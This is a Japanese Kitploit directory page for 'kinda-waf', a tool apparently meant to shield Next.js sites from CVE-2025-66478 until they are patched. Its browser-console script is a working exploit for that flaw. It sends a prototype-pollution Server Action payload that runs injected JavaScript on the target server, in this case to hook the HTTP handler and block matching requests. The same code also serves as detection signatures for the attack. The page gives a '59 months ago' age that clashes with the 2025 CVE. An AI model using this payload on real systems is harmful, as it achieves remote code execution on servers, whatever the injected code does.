Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-66478-kinda-waf — ウェブサイトが適切にパッチ適用されるまで安全を保つ手助けをしましょう! | Kitploit
ツール/GitHubGitHub/aiexz/cve-2025-66478-kinda-waf
脆弱性スキャナーエクスプロイトIDS/IPS回避WAFバイパスウェブセキュリティペネトレーションテスト
GitHubaiexz/cve-2025-66478-kinda-waf

CVE-2025-66478-kinda-waf

ウェブサイトが適切にパッチ適用されるまで安全を保つ手助けをしましょう!

リポジトリを見る
59ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

kinda-waf

単純な一時的なWAF防御テスターで、特定のペイロードシーケンスを対象としています。

ウェブサイトが適切にパッチ適用されるまで安全を保つのを助けましょう!

目的

CVE-2025-66478から保護するために、特定のペイロードシグネチャを含むリクエストを検出しブロックします。これは正規のトラフィックを壊さず、適切にメンテナンスされていないウェブサイトを守るはずです。

そして再起動後はリセットされるため、恒久的な解決策ではありません

要件

  • Python 3

使い方

スクリプトを実行(デフォルトはlocalhost):

root@kitploit:~
python main.py

特定のURLで実行:

root@kitploit:~
python main.py http://example.com/

ブラウザで実行するバージョン:

はい、ブラウザコンソールでそのまま実行できます:

root@kitploit:~
const formData = new FormData();

const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");

fetch("/", {
  method: "POST",
  body: formData,
  headers: {
    "Next-Action": "x",
  }
})
  .then(async res => console.log(await res.text()));
ツールをダウンロード